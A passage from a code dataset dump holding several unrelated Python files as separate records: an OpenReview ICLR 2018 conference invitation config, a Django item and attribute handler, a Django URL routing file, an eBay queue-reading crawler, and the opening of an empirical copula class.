[CONF]\n}\n\nprogram_chairs_params = {\n 'readers': [CONF, PROGRAM_CHAIRS],\n 'writers': [CONF],\n 'signatories': [CONF, PROGRAM_CHAIRS],\n 'signatures': [CONF],\n 'web': os.path.join(os.path.dirname(__file__), '../webfield/programchairWebfield.js'),\n}\n\narea_chairs_params = {\n 'readers': [CONF, PROGRAM_CHAIRS, AREA_CHAIRS],\n 'writers': [CONF],\n 'signatories': [CONF],\n 'signatures': [CONF],\n 'web': os.path.join(os.path.dirname(__file__), '../webfield/areachairWebfield.html'),\n}\n\nreviewer_group_params = {\n 'readers': [CONF, AREA_CHAIRS, PROGRAM_CHAIRS],\n 'writers': [CONF],\n 'signatories': [CONF],\n 'signatures': [CONF]\n}\n\n\n\"\"\"\n/-/Submission\n\nThis is the invitation that users submit to. These are un-blinded notes. The process\nfunction generates a /-/Blind_Submission note.\n\n\"\"\"\nSUBMISSION = CONF + '/-/Submission'\n\nsubmission_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': ['~'],\n 'signatures': [CONF],\n 'process': os.path.join(os.path.dirname(__file__), '../process/submissionProcess.js'),\n 'reply': {\n 'forum': None,\n 'replyto': None,\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'values-copied': [CONF, PROGRAM_CHAIRS, '{content.authorids}', '{signatures}']\n },\n 'signatures': {\n 'description': 'Your authorized identity to be associated with the above content.',\n 'values-regex': '~.*|' + CONF\n },\n 'writers': {\n 'values': [CONF]\n },\n 'content':{\n 'title': {\n 'description': 'Title of paper.',\n 'order': 1,\n 'value-regex': '.{1,250}',\n 'required':True\n },\n 'authors': {\n 'description': 'Comma separated list of author names. Please provide real names; identities will be anonymized.',\n 'order': 2,\n 'values-regex': \"[^;,\\\\n]+(,[^,\\\\n]+)*\",\n 'required':True\n },\n 'authorids': {\n 'description': 'Comma separated list of author email addresses, lowercased, in the same order as above. For authors with existing OpenReview accounts, please make sure that the provided email address(es) match those listed in the author\\'s profile. Please provide real emails; identities will be anonymized.',\n 'order': 3,\n 'values-regex': \"([a-z0-9_\\-\\.]{2,}@[a-z0-9_\\-\\.]{2,}\\.[a-z]{2,},){0,}([a-z0-9_\\-\\.]{2,}@[a-z0-9_\\-\\.]{2,}\\.[a-z]{2,})\",\n 'required':True\n },\n 'keywords': {\n 'description': 'Comma separated list of keywords.',\n 'order': 6,\n 'values-regex': \"(^$)|[^;,\\\\n]+(,[^,\\\\n]+)*\"\n },\n 'TL;DR': {\n 'description': '\\\"Too Long; Didn\\'t Read\\\": a short sentence describing your paper',\n 'order': 7,\n 'value-regex': '[^\\\\n]{0,250}',\n 'required':False\n },\n 'abstract': {\n 'description': 'Abstract of paper.',\n 'order': 8,\n 'value-regex': '[\\\\S\\\\s]{1,5000}',\n 'required':True\n },\n 'pdf': {\n 'description': 'Upload a PDF file that ends with .pdf',\n 'order': 9,\n 'value-regex': 'upload',\n 'required':True\n }\n }\n }\n}\n\n\n\"\"\"\n/-/Blind_Submission\n\nThis is the invitation for the blinded version of the submissions.\nEach of these notes have an \"original\" field which points to the non-anonymous\nversion of the note. They are generated by the /-/Submission process function.\n\n\"\"\"\nBLIND_SUBMISSION = CONF + '/-/Blind_Submission'\n\nblind_submission_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': [CONF],\n 'signatures': [CONF],\n 'reply': {\n 'forum': None,\n 'replyto': None,\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'values': ['everyone']\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values': [CONF]\n },\n 'writers': {\n 'values': [CONF]\n },\n 'content': {\n 'authors': {\n 'description': 'Comma separated list of author names, as they appear in the paper.',\n 'order': 1,\n 'values-regex': '.*',\n 'required': False\n },\n 'authorids': {\n 'description': 'Comma separated list of author email addresses, in the same order as above.',\n 'order': 2,\n 'values-regex': '.*',\n 'required': False\n }\n }\n }\n}\n\n\"\"\"\n/-/Withdrawn_Submission\n\nThis is an invitation that gets fulfilled when a user withdraws a submission\nafter the submission deadline. Setting withdrawals up this way allows us to\neasily put all withdrawn notes in a single tab.\n\n\"\"\"\nWITHDRAWN_SUBMISSION = CONF + '/-/Withdrawn_Submission'\n\nwithdrawn_submission_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': [CONF],\n 'signatures': [CONF],\n 'reply': {\n 'forum': None,\n 'replyto': None,\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'values': ['everyone']\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values': [CONF]\n },\n 'writers': {\n 'values': [CONF]\n },\n 'content': {}\n }\n}\n\n\n\"\"\"\n/-/Public_Comment\n\nThis is the invitation for non-anonymous comments made by the public.\nUsers sign using their tilde (~) IDs.\n\"\"\"\nPUBLIC_COMMENT = CONF + '/-/Public_Comment'\n\npublic_comment_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': [],\n 'noninvitees': [REVIEWERS, AREA_CHAIRS, AUTHORS, PROGRAM_CHAIRS],\n 'signatures': [CONF],\n 'process': os.path.join(os.path.dirname(__file__), '../process/commentProcess.js'),\n 'reply': {\n 'forum': None,\n 'replyto': None,\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'value-dropdown': ['everyone', AUTHORS_PLUS, REVIEWERS_PLUS, AREA_CHAIRS_PLUS, PROGRAM_CHAIRS]\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values-regex': '~.*|\\\\(anonymous\\\\)'\n },\n 'writers': {\n 'values-regex': '~.*|\\\\(anonymous\\\\)'\n },\n 'content':{\n 'title': {\n 'order': 0,\n 'value-regex': '.{1,500}',\n 'description': 'Brief summary of your comment.',\n 'required': True\n },\n 'comment': {\n 'order': 1,\n 'value-regex': '[\\\\S\\\\s]{1,5000}',\n 'description': 'Your comment or reply (max 5000 characters).',\n 'required': True\n }\n }\n }\n}\n\n\n\"\"\"\n/-/Paper[0-9]+/Official_Comment\n\nThis is the invitation for comments by users in official ICLR reviewing\nroles (reviewers, area chairs, or program chairs).\n\n\"\"\"\n\nofficial_comment_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': [],\n 'signatures': [CONF],\n 'process': os.path.join(os.path.dirname(__file__), '../process/commentProcess.js'),\n 'reply': {\n 'forum': None,\n 'replyto': None,\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'value-dropdown': ['everyone', AUTHORS_PLUS, REVIEWERS_PLUS, AREA_CHAIRS_PLUS, PROGRAM_CHAIRS]\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values-regex': ''\n },\n 'writers': {\n 'values-regex': ''\n },\n 'content':{\n 'title': {\n 'order': 0,\n 'value-regex': '.{1,500}',\n 'description': 'Brief summary of your comment.',\n 'required': True\n },\n 'comment': {\n 'order': 1,\n 'value-regex': '[\\\\S\\\\s]{1,5000}',\n 'description': 'Your comment or reply (max 5000 characters).',\n 'required': True\n }\n }\n }\n}\n\n\"\"\"\n/-/Paper[0-9]+/Official_Review\n\nThis is the invitation for official reviews left by invited ICLR 2018 reviewers.\nIt gets posted with toggle-invitations.py, which also assigns it an ID based on paper number.\n\"\"\"\n\nofficial_review_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': [],\n 'signatures': [CONF],\n 'process': os.path.join(os.path.dirname(__file__), '../process/officialReviewProcess.js'),\n 'duedate': 1511845199000, # 23:59:59 EST on November 27, 2017\n 'reply': {\n 'forum': None,\n 'replyto': None,\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'values': [AREA_CHAIRS_PLUS]\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values-regex': ''\n },\n 'writers': {\n 'values-regex': ''\n },\n 'content':{\n 'title': {\n 'order': 1,\n 'value-regex': '.{0,500}',\n 'description': 'Brief summary of your review.',\n 'required': True\n },\n 'review': {\n 'order': 2,\n 'value-regex': '[\\\\S\\\\s]{1,200000}',\n 'description': 'Please provide an evaluation of the quality, clarity, originality and significance of this work, including a list of its pros and cons (max 200000 characters).',\n 'required': True\n },\n 'rating': {\n 'order': 3,\n 'value-dropdown': [\n '10: Top 5% of accepted papers, seminal paper',\n '9: Top 15% of accepted papers, strong accept',\n '8: Top 50% of accepted papers, clear accept',\n '7: Good paper, accept',\n '6: Marginally above acceptance threshold',\n '5: Marginally below acceptance threshold',\n '4: Ok but not good enough - rejection',\n '3: Clear rejection',\n '2: Strong rejection',\n '1: Trivial or wrong'\n ],\n 'required': True\n },\n 'confidence': {\n 'order': 4,\n 'value-radio': [\n '5: The reviewer is absolutely certain that the evaluation is correct and very familiar with the relevant literature',\n '4: The reviewer is confident but not absolutely certain that the evaluation is correct',\n '3: The reviewer is fairly confident that the evaluation is correct',\n '2: The reviewer is willing to defend the evaluation, but it is quite likely that the reviewer did not understand central parts of the paper',\n '1: The reviewer\\'s evaluation is an educated guess'\n ],\n 'required': True\n }\n }\n }\n}\n\n\"\"\"\n/-/Paper[0-9]+/Meta_Review\n\nThis is the invitation for meta reviews left by invited ICLR 2018 area chairs.\nIt gets posted with toggle-invitations.py, which also assigns it an ID based on paper number.\n\"\"\"\n\nmeta_review_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': [],\n 'signatures': [CONF],\n 'process': os.path.join(os.path.dirname(__file__), '../process/metaReviewProcess.js'),\n 'duedate': 1516424399000, # 23:59:59 EST on January 19, 2018\n 'reply': {\n 'forum': None,\n 'replyto': None,\n 'writers': {\n 'values-regex': CONF + '.*'\n },\n 'signatures': {\n 'values-regex': CONF + '.*'\n },\n 'readers': {\n 'values': [AREA_CHAIRS_PLUS],\n 'description': 'The users who will be allowed to read the above content.'\n },\n 'nonreaders': {},\n 'content': {\n 'title': {\n 'order': 1,\n 'value-regex': '.{1,500}',\n 'description': 'Brief summary of your review.',\n 'required': True\n },\n 'metareview': {\n 'order': 2,\n 'value-regex': '[\\\\S\\\\s]{1,5000}',\n 'description': 'Please provide an evaluation of the quality, clarity, originality and significance of this work, including a list of its pros and cons.',\n 'required': True\n },\n 'recommendation': {\n 'order': 3,\n 'value-dropdown': [\n 'Accept (Oral)',\n 'Accept (Poster)',\n 'Reject',\n 'Invite to Workshop Track'\n ],\n 'required': True\n },\n 'confidence': {\n 'order': 4,\n 'value-radio': [\n '5: The area chair is absolutely certain',\n '4: The area chair is confident but not absolutely certain',\n '3: The area chair is somewhat confident',\n '2: The area chair is not sure',\n '1: The area chair\\'s evaluation is an educated guess'\n ],\n 'required': True\n }\n }\n }\n};\n\n\"\"\"\n/-/Acceptance_Decision\n\"\"\"\nacceptance_decision_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': [],\n 'signatures': [CONF],\n 'reply': {\n 'forum': None,\n 'replyto': None,\n 'invitation': BLIND_SUBMISSION,\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'value-dropdown': ['ICLR.cc/2018/Conference/Program_Chairs', 'everyone']\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values': [PROGRAM_CHAIRS]\n },\n 'writers': {\n 'values': [PROGRAM_CHAIRS]\n },\n 'content': {\n 'title': {\n 'order': 1,\n 'value': 'ICLR 2018 Conference Acceptance Decision',\n 'required': True\n },\n 'decision': {\n 'order': 2,\n 'value-dropdown': [\n 'Accept (Oral)',\n 'Accept (Poster)',\n 'Reject',\n 'Invite to Workshop Track'\n ],\n 'required': True\n },\n 'comment': {\n 'order': 3,\n 'value-regex': '[\\\\S\\\\s]{0,5000}',\n 'description': '(optional) Comment on this decision.',\n 'required': False\n },\n }\n }\n}\n\n\n\"\"\"\n/-/Paper[0-9]+/Withdraw_Paper\n\nThis is the invitation for paper withdrawals.\n\"\"\"\n\nwithdraw_paper_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': [],\n 'signatures': [CONF],\n 'process': os.path.abspath(os.path.join(os.path.dirname(__file__), '../process/withdrawProcess_reveal.js')),\n 'reply': {\n 'referent': None, # replaced in invitations.py\n 'forum': None, # replaced in invitations.py\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'values': ['everyone']\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values-regex': '~.*'\n },\n 'writers': {\n 'values-regex': '~.*'\n },\n 'content':{\n 'withdrawal': {\n # For withdrawProcess_delete.js:\n #'description': 'Confirm your withdrawal. The blind record of your paper will be deleted. Your identity will NOT be revealed. This cannot be undone.',\n # For withdrawProcess_reveal.js:\n 'description': 'Confirm your withdrawal. Your identity will be revealed to the public. This cannot be undone.',\n 'order': 1,\n 'value-radio': ['Confirmed'],\n 'required':True\n }\n }\n }\n}\n\n\"\"\"\n/-/Paper[0-9]+/Add_Revision\n\nThis is the invitation for paper revisions\n\"\"\"\n\nadd_revision_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': [], # set during submission process function; replaced in invitations.py\n 'signatures': [CONF],\n 'process': os.path.abspath(os.path.join(os.path.dirname(__file__), '../process/addRevisionProcess.js')),\n 'reply': {\n 'forum': None,\n 'referent': None,\n 'signatures': submission_params['reply']['signatures'],\n 'writers': submission_params['reply']['writers'],\n 'readers': submission_params['reply']['readers'],\n 'content': submission_params['reply']['content']\n }\n}\n\n\n\"\"\"\n/-/Add_Bid\n\nThis is the invitation to bid on papers.\n\nThere is a special interface to view bids, defined by the webfield.\n\n\"\"\"\nADD_BID = CONF + '/-/Add_Bid'\n\nadd_bid_params = {\n 'readers': [CONF, PROGRAM_CHAIRS, AREA_CHAIRS, REVIEWERS],\n 'writers': [CONF],\n 'invitees': [],\n 'signatures': [CONF],\n 'duedate': 1509595199000, # 23:59:59 EST on November 1, 2017\n 'web': os.path.abspath(os.path.join(os.path.dirname(__file__), '../webfield/bidWebfield.js')),\n 'taskCompletionCount': 50,\n 'multiReply': False,\n 'reply': {\n 'forum': None,\n 'replyto': None,\n 'invitation': BLIND_SUBMISSION,\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'values-copied': [CONF, '{signatures}']\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values-regex': '~.*'\n },\n 'content': {\n 'tag': {\n 'description': 'Bid description',\n 'order': 1,\n 'value-dropdown': ['I want to review',\n 'I can review',\n 'I can probably review but am not an expert',\n 'I cannot review',\n 'No bid'],\n 'required':True\n }\n }\n }\n}\n\n\n\"\"\"\n/-/Paper_Metadata\n\nThis is the invitation to post paper metadata, used in paper-reviewer matching.\n\n\"\"\"\nMETADATA = CONF + '/-/Paper_Metadata'\n\nmetadata_params = {\n 'readers': [CONF],\n 'writers': [CONF],\n 'invitees': [CONF],\n 'signatures': [CONF],\n 'reply': {\n 'forum': None,\n 'replyto': None,\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'values': [CONF]\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values-regex': CONF\n },\n 'writers': {\n 'values-regex': CONF\n },\n 'content': {}\n }\n}\n\n\n\n\"\"\"\n/-/Paper_Assignments\n\nThis is the invitation to post assignment notes, used in the paper-reviewer\nmatching system.\n\n\"\"\"\nASSIGNMENTS = CONF + '/-/Paper_Assignments'\n\nassignments_params = {\n 'writers': [CONF],\n 'readers': [CONF],\n 'invitees': [CONF],\n 'signatures': [CONF],\n 'reply': {\n 'forum': None,\n 'replyto': None,\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'values': [CONF]\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values-regex': CONF\n },\n 'writers': {\n 'values-regex': CONF\n }\n }\n}\n\n\n\"\"\"\n/-/Recruit_Area_Chairs\n\nThis is the invitation to recruit area chairs.\n\"\"\"\nRECRUIT_AREA_CHAIRS = CONF + '/-/Recruit_Area_Chairs'\n\nrecruit_area_chairs_params = {\n 'readers': [CONF],\n 'writers': [CONF],\n 'invitees': [AREA_CHAIRS_INVITED],\n 'signatures': [CONF],\n 'process': os.path.abspath(os.path.join(os.path.dirname(__file__), '../process/recruitAreachairsProcess.js')),\n 'web': os.path.abspath(os.path.join(os.path.dirname(__file__), '../webfield/recruitAreachairsWebfield.html')),\n 'reply': {\n 'content': {\n 'username': {\n 'description': 'OpenReview username (e.g. ~Alan_Turing1)',\n 'order': 1,\n 'value-regex': '~.*'\n },\n 'key': {\n 'description': 'Email key hash',\n 'order': 2,\n 'value-regex': '.{0,100}'\n },\n 'response': {\n 'description': 'Invitation response',\n 'order': 3,\n 'value-radio': ['Yes', 'No']\n }\n },\n 'readers': {\n 'values': [CONF]\n },\n 'signatures': {\n 'values-regex': '\\\\(anonymous\\\\)'\n },\n 'writers': {\n 'values-regex': '\\\\(anonymous\\\\)'\n }\n }\n}\n\n\n\n\"\"\"\n/-/Recruit_Reviewers\n\nThis is the invitation to recruit reviewers.\n\"\"\"\nRECRUIT_REVIEWERS = CONF + '/-/Recruit_Reviewers'\n\nrecruit_reviewers_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': [REVIEWERS_INVITED],\n 'signatures': [CONF],\n 'process': os.path.abspath(os.path.join(os.path.dirname(__file__), '../process/recruitReviewersProcess.js')),\n 'web': os.path.abspath(os.path.join(os.path.dirname(__file__), '../webfield/recruitReviewersWebfield.html')),\n 'reply': {\n 'content': {\n 'username': {\n 'description': 'OpenReview username or email address (e.g. ~Alan_Turing1)',\n 'order': 1,\n 'value-regex': '.*'\n },\n 'key': {\n 'description': 'Email key hash',\n 'order': 2,\n 'value-regex': '.{0,100}'\n },\n 'response': {\n 'description': 'Invitation response',\n 'order': 3,\n 'value-radio': ['Yes', 'No']\n }\n },\n 'readers': {\n 'values': [CONF]\n },\n 'signatures': {\n 'values-regex': '\\\\(anonymous\\\\)'\n },\n 'writers': {\n 'values-regex': '\\\\(anonymous\\\\)'\n }\n }\n}\n","sub_path":"venues/ICLR.cc/2018/Conference/python/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":24890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"338641827","text":"from django.conf import settings\nfrom django.core.exceptions import ValidationError\nfrom nepcore.forms.fields import CUSTOM_FIELD_MAP\n\nfrom item.models import ItemType, Item, Attribute, ItemAttribute, ItemAttributeValue\n\nclass Items(object):\n\n def _create_item_attr_relation(self, itemType, attr):\n obj = ItemAttribute(itemType=itemType, attribute=attr)\n obj.save()\n\n def _create_item_attr_value(self, item, attr, value):\n obj = ItemAttributeValue(item=item, attribute=attr, value=value)\n obj.save()\n\n def _is_valid_data(self, dataType, data):\n try:\n field = CUSTOM_FIELD_MAP[dataType]()\n field.clean(data)\n return False\n except ValidationError as e:\n return e.messages[0]\n\nclass HandleItems(Items):\n\n def __init__(self, data):\n self.data = data\n self.errors = []\n\n def _validate_single_fields(self, data):\n errors = {}\n\n for k, v in data.iteritems():\n _id = k\n value = v\n attr_errors = {}\n\n try:\n attr = Attribute.objects.get(id=_id)\n except:\n attr_errors[_id] = 'No attributes exist with given id.'\n\n if not value and value != 0:\n attr_errors['value'] = 'No value given for attribute.'\n\n if attr_errors:\n errors[_id] = attr_errors\n else:\n error = self._is_valid_data(attr.dataType, value)\n if error:\n errors[_id] = error\n\n return errors\n\n @classmethod\n def delete_item(self, itemPK):\n item = Item.objects.get(pk=itemPK)\n item.archived = True\n item.save()\n\n def is_valid(self):\n #validate input for item creation/updating.\n\n self.errors = {}\n validated = True\n\n #expected input for item creation:\n # {\n # 'itemType': '1',\n # 'itemName': '320d',\n # '232': 'almost grey',\n # '23': 'The fastest diesel',\n # '28': 'Greater than beetle'\n # }\n\n #expected input for item update:\n # {\n # 'itemPK: '1',\n # 'itemType': '1',\n # 'itemName': '320d',\n # '232': 'almost grey',\n # '23': 'The fastest diesel',\n # '28': 'Greater than beetle'\n # }\n\n temp = self.data.copy()\n\n create = True\n\n if 'itemPK' in temp:\n create = False\n del temp['itemPK']\n\n if 'itemType' in temp:\n try:\n ItemType.objects.get(id=temp['itemType'])\n except:\n self.errors['itemType'] ='itemType does not exist.'\n validated = False\n else:\n self.errors['itemType'] = 'No itemType given.'\n validated = False\n\n del temp['itemType']\n\n if 'itemName' not in temp:\n self.errors['itemName'] = 'No itemName given.'\n validated = False\n else:\n del temp['itemName']\n\n attrErrors = self._validate_single_fields(temp)\n\n if attrErrors:\n self.errors = attrErrors\n validated = False\n\n if validated:\n if create:\n self._create_item_with_attributes(self.data)\n return True\n else:\n self._update_item_and_attributes(self.data)\n return True\n else:\n return False\n\n #private methods\n def _create_item(self, name, itemType):\n obj = Item(name=name, itemType=itemType)\n obj.save()\n return obj\n\n def _create_item_with_attributes(self, data):\n #creates item and populate its properties values.\n itemT = ItemType.objects.get(id=data['itemType'])\n item = self._create_item(data['itemName'], itemT)\n\n del data['itemType']\n del data['itemName']\n\n for k, v in data.iteritems():\n attribute = Attribute.objects.get(id=k)\n self._create_item_attr_value(item, attribute, v)\n\n def _update_item_and_attributes(self, data):\n #updates item and its properties values.\n item = Item.objects.get(pk=data['itemPK'])\n itemT = ItemType.objects.get(id=data['itemType'])\n\n item.name = data['itemName']\n item.save()\n\n del data['itemPK']\n del data['itemType']\n del data['itemName']\n\n for k, v in data.iteritems():\n # If an item was created without a value for a specific field, that value\n # will not show up in itemAttributeValue. This will cause an DoesNotExist\n # error. Now it will create that itemAttributeValue if it does not exist.\n try:\n attribute = ItemAttributeValue.objects.get(item=item.pk, attribute=k)\n attribute.value = v\n attribute.save()\n except:\n attribute = Attribute.objects.get(id=k)\n self._create_item_attr_value(item, attribute, v)\n\n @classmethod\n def get_item_values(self, itemID):\n #returns a dict of field values for an item\n item = Item.objects.get(id=itemID)\n fields = {}\n objs = ItemAttributeValue.objects.all().filter(item=item)\n\n for obj in objs:\n fields.update({obj.attribute.label: obj.value})\n\n return {'item': item.name, 'fields': fields, 'itemType': item.itemType.name}\n\n @classmethod\n def get_all_items(self):\n #Returns all items in the db.\n returnItems = []\n for item in Item.objects.all():\n returnItems.append({'itemID': item.id,\n 'itemName': item.name,\n 'itemType': item.itemType.name})\n\n return {'items': returnItems}\n\n @classmethod\n def get_all_items_for_type(self, itemTypePK):\n #Return all items of a specified item type, except if it is archived.\n returnItems = []\n itemType = ItemType.objects.get(pk=itemTypePK)\n\n for item in Item.objects.all().filter(itemType=itemType):\n if not item.archived:\n returnItems.append({'itemID': item.id,\n 'itemName': item.dataType})\n\n return {'items': returnItems}\n\nclass HandleItemTypes(Items):\n\n def __init__(self, data):\n self.errors = []\n self.data = data\n\n def _validate_attributes(self, data):\n #validate attributes when new ones are created.\n #Code needs revision. Crude, but works. Can be better. :'(\n errors = {}\n for attr in data:\n index = 0\n attr_errors = {}\n label= ''\n dataType= ''\n required= ''\n default= ''\n for k, v in attr.iteritems():\n if k == 'index':\n index = v\n elif k == 'label':\n label = v\n elif k == 'dataType':\n dataType = v\n elif k == 'required':\n required = v\n elif k == 'default':\n default = v\n\n if not label:\n attr_errors['label'] = 'No label given.'\n\n #dataType = True\n if not dataType:\n attr_errors['dataType'] = 'No dataType given.'\n #dataType = False\n elif dataType not in ['str', 'int', 'dat', 'tim']:\n attr_errors['dataType'] = 'dataType not allowed.'\n #dataType = False\n\n if not default:\n attr['default'] = ''\n else:\n if dataType:\n error = self._is_valid_data(dataType, default)\n if error:\n attr_errors['default'] = error\n\n ## Requried is nie 'n required field nie?\n # if not required:\n # attr_errors['required'] = 'No required given.'\n\n if attr_errors:\n errors[index] = attr_errors\n\n return data, errors\n\n def is_valid(self):\n #validate input for dataType and attribute creation.\n\n self.errors = {}\n validated = True\n\n if 'itemType' in self.data:\n try:\n ItemType.objects.get(name=self.data['itemType'])\n self.errors['itemType'] ='itemType already exists.'\n validated = False\n except:\n pass\n else:\n self.errors['itemType'] = 'No itemType given.'\n validated = False\n\n data2, attrErrors = self._validate_attributes(self.data['attributes'])\n self.data['attributes'] = data2\n if attrErrors:\n self.errors['attributes'] = attrErrors\n validated = False\n\n if validated:\n self._create_type_with_attrs(self.data)\n return True\n else:\n return False\n\n #private methods\n def _create_itemType(self, name, description):\n obj = ItemType(name=name, description=description)\n obj.save()\n return obj\n\n def _create_attribute(self, label, dataType, defaultValue, required):\n obj = Attribute(label=label, dataType=dataType, defaultValue=defaultValue, required=required)\n obj.save()\n return obj\n\n #public methods\n def _create_type_with_attrs(self, input):\n #creates a new item type and its attributes and links them.\n try:\n itemType = self._create_itemType(input['itemType'], input['itemType'])\n for attr in input['attributes']:\n newAttr = self._create_attribute(attr['label'], attr['dataType'], attr.get('default',None), attr.get('required',False))\n self._create_item_attr_relation(itemType, newAttr)\n return True\n except Exception as e:\n print(e)\n return False\n\n @classmethod\n def get_all_item_types(self):\n #return all item types: {itemTypeID:ItemTypeName}\n result = {}\n for itemType in ItemType.objects.all():\n result[itemType.id] = itemType.name\n return result\n\n @classmethod\n def get_item_type_attrs(self, itemTypePK):\n #expects an itemType name\n #returns a dict with attribute types as follows:\n # {'itemTypeId': 0, 'fields': [{'fieldId': 0, 'dataType': 'str', 'label': 'Name'}]}\n\n fields = []\n #itemType = ItemType.objects.get(pk=itemTypePK)\n itAts = ItemAttribute.objects.all().filter(itemType=itemTypePK)\n\n return itAts","sub_path":"item/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":10527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"577368147","text":"from django.conf.urls import url, patterns\n\nfrom . import views\n\n\nurlpatterns = [\n url(r'^$', views.index, name='case_index'),\n url(r'^module/(?P\\d+\\.\\d+)/$', views.module_show, name='module_show'),\n url(r'^update_settings$', views.update_setting, name='default_set'),\n url(r'^create$', views.create, name='case_create'),\n url(r'^save$', views.save, name='case_save'),\n url(r'^upload$', views.upload, name='case_upload'),\n url(r'^import$', views.process_import, name='import_file'),\n url(r'^update_time', views.update_case_time, name='update_time'),\n url(r'^test$', views.test_model),\n\n\n]\n\n\n\n# print static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"casemanager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"622070356","text":"import sys\n\nfrom crawlers import BaseCrawler\n\n\nclass EbayCrawler(BaseCrawler):\n crawler_name = 'eBay'\n\n def __init__(self, logger, message_bus, ebay_app_settings, crawler_settings):\n super().__init__(logger, crawler_settings)\n\n self._ebay_app_settings = ebay_app_settings\n self._message_bus = message_bus\n\n # Инициализация \"подслушиваемой\" очереди\n self._message_bus.init_queue(info=self._settings['listener'])\n\n # Подписывается на сообщение каждой итерации while true\n self.subscribe('iteration', self.iteration)\n # Подписывается на сообщение об исчерпании лимита обрабатываемых сообщений\n self.subscribe('stop_iteration', self.limit)\n\n def iteration(self):\n # Извлекает 1 сообщение из очереди на каждую итерацию цикла\n output = self._message_bus.get_message(\n info=self._settings['listener']\n )\n\n if not output:\n self._logger.debug('Пустое сообщение.')\n\n return output\n\n def limit(self):\n # Если достигнут лимит - завершает приложение\n self._logger.info('Достигнул лимит обработки сообщений.')\n sys.exit(1)\n","sub_path":"application/crawlers/ebay/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"198926439","text":"from typing import Optional, Union\n\nimport numpy as np\nimport pandas as pd\nfrom scipy.stats import beta\n\nfrom copulae.copula import BaseCopula\nfrom copulae.copula import Summary\nfrom copulae.core import rank_data\nfrom copulae.special import log_sum\nfrom copulae.types import Array, EPSILON, Ties\nfrom copulae.utility.array import array_io_mcd\nfrom .distribution import emp_dist_func\n\ntry:\n from typing import Literal\nexcept ImportError:\n from typing_extensions import Literal\n\nSmoothing = Literal['none', 'beta', 'checkerboard']\n\n\nclass EmpiricalCopula(BaseCopula[None]):\n \"\"\"\n Given pseudo-observations from a distribution with continuous margins and copula, the empirical copula is\n the (default) empirical distribution function of these pseudo-observations. It is thus a natural nonparametric\n estimator of the copula.\n\n Examples\n --------\n >>> from copulae import EmpiricalCopula\n >>> from copulae.datasets import load_marginal_data\n >>> df = load_marginal_data()\n >>> df.head(3)\n STUDENT NORM EXP\n 0 -0.485878 2.646041 0.393322\n 1 -1.088878 2.906977 0.253731\n 2 -0.462133 3.166951 0.480696\n >>> emp_cop = EmpiricalCopula(3, df, smoothing=\"beta\")\n >>> data = emp_cop.data # getting the pseudo-observation data (this is the converted df)\n >>> data[:3]\n array([[0.32522493, 0.1886038 , 0.55781406],\n [0.15161613, 0.39953349, 0.40953016],\n [0.33622126, 0.65611463, 0.62645785]])\n # must feed pseudo-observations into cdf\n >>> emp_cop.cdf(data[:2])\n array([0.06865595, 0.06320104])\n >>> emp_cop.pdf([[0.5, 0.5, 0.5]])\n 0.009268568506099015\n >>> emp_cop.random(3, seed=10)\n array([[0.59046984, 0.98467178, 0.16494502],\n [0.31989337, 0.28090636, 0.09063645],\n [0.60379873, 0.61779407, 0.54215262]])\n \"\"\"\n\n def __init__(self, dim: Optional[int] = None, data: Optional[Union[np.ndarray, pd.DataFrame]] = None,\n smoothing: Optional[Smoothing] = None, ties: Ties = \"average\", offset: float = 0):\n \"\"\"\n Creates an empirical copula\n\n Parameters\n ----------\n dim\n Dimension of the copula. If this is not provided, it will be derived from the dimension of the data set\n\n data\n The data set for the empirical copula. The data set dimension must match the copula's dimension. If\n dim is not set, the dimension of the copula will be derived from the data's dimension. Data must be\n a matrix\n\n smoothing\n If not specified (default), the empirical distribution function or copula is computed. If 